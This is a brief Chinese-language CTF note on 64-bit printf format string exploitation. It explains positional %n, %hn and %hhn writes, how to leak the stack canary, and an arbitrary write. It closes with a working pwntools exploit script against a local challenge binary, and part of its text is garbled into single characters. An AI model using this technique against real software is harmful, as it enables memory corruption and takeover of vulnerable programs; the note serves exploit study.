64位:前六个参数 rdi rsi rdx rcx r8 r9,之后的参数通过栈传递
printf("%1$10d",123,456);
1指定第1个参数,(不包括格式串,所以是从rsi开始数)
10是输出的最小宽度 10个字符,d输出整数
实现任意地址写:
%N
h
h
n
/
/
h
h
n
一
次
写
一
个
字
节
hhn //hhn一次写一个字节 %N
hhn//hhn一次写一个字节hn //hn一次写两个字节
%N$n //n一次写四个字节
N指定的参数是要写入变量的地址,会把前面已经输出的字符个数写到给定地址处
利用方式:
- 泄露canary
printf 参数 format->rdi,跳过5个寄存器参数,format大小40,跳过五个参数(callprintf的时候,rsp指向了format,不是的话需要根据rsp计算出跳过多少个字节),canary是第11个参数.
- 写任意地址
给了v4的地址,利用printf修改v4的值即可.
如何把v4的地址传给printf???,把v4地址放在buf里面即可,然后把参数位置指定到buf里面,就可以了.
Exp如下:
from pwn import *
sh = process("./main")
sh.recvuntil("this is a gift:")
addr = int(sh.recvline()[0:-1],16)
#0x00 00 05 22
payload = "%1314u%10$n".ljust(16,"x00")
payload += p64(addr)
#gdb.attach(sh)
sh.sendlineafter("please input your format:",payload)
sh.interactive()
